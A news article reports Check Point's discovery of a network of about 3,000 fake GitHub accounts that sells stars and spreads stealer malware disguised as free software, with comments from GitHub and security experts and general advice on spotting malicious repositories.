A secret network of around 3,000 “ghost” accounts on GitHub has been discovered manipulating the code-hosting platform to promote malware and phishing links. Recent research conducted by cybersecurity firm Check Point exposed the activities of a cybercriminal the researchers have named “Stargazer Goblin.”
Since June 2023 or even earlier, Stargazer Goblin has been active on Microsoft-owned GitHub, the world’s largest open-source code repository. The site hosts millions of developers’ projects, and Stargazer Goblin has been using its community tools to boost malicious code repositories’ visibility and perceived legitimacy.
Antonis Terefos, a malware reverse engineer at Check Point who uncovered this network, highlighted the sophistication of the operation. He noted that while GitHub has been targeted by cybercriminals before, the scale and method of this operation are unprecedented.
Repositories and stars are bought and sold through a cybercrime-linked Telegram channel and various criminal marketplaces. Telegram is commonly used by cybercriminals, their clients, and their victims. Terefos said he has never seen this kind of network of fake accounts operating like this on GitHub.
The Stargazers Ghost Network by Check Point spreads malware disguised as legitimate tools for social media, gaming, and cryptocurrency applications. Some examples included code for running VPNs or licensing software like Adobe Photoshop. Such repositories target Windows users who are searching for free software online.
The network charges other hackers to use its services. Check Point has identified various types of malware distributed through this network, including the Atlantida Stealer, Rhadamanthys, and Lumma Stealer. Terefos discovered the network while digging into instances of the Atlantida Stealer.
Stargazer Goblin places ads on cybercrime forums, and its Telegram channel offers services such as 100 stars for $10 and 500 stars for $50. It also offers to clone existing repositories and provide trusted accounts. Check Point’s research indicates that the network may have started these activities as early as August 2022 and could have collected up to $100,000 since then. From mid-May to mid-June this year alone, the operator reportedly made around $8,000.
Terefos has observed legitimate repositories being hijacked and transformed into malicious ones using stolen credentials. The malicious code could be further propagated if legitimate users fork these compromised repositories. Automated tools help Terefos identify accounts linked to the network by recognizing common features, such as similar templates and tags.
When GitHub identifies an account supporting illegal malware campaigns, it disables those user accounts for violating its Acceptable Use Policies. Alexis Wales, vice president of security operations at GitHub, stated that the company has dedicated teams to detect and remove such content and accounts. These teams use a combination of manual reviews and at-scale detections using machine learning to identify suspicious behavior.
Unfortunately, GitHub is a gigantic target with over 100 million users and 420 million repositories. This makes it a reasonably insignificant challenge for cybercriminals to hide within the user base like a grain of sand on the beach.
Jake Moore, global cybersecurity adviser at security firm Eset, warned GitHub users about the risks of downloading malicious code. Indicators of malicious repositories include unexpected code changes, code accessing external resources, and hard-coded credentials or API keys.
Stargazer Goblin’s network might be even broader, as evidenced by a YouTube account sharing malicious links via videos. Terefos emphasizes that the full extent of the network’s operations is still not entirely known.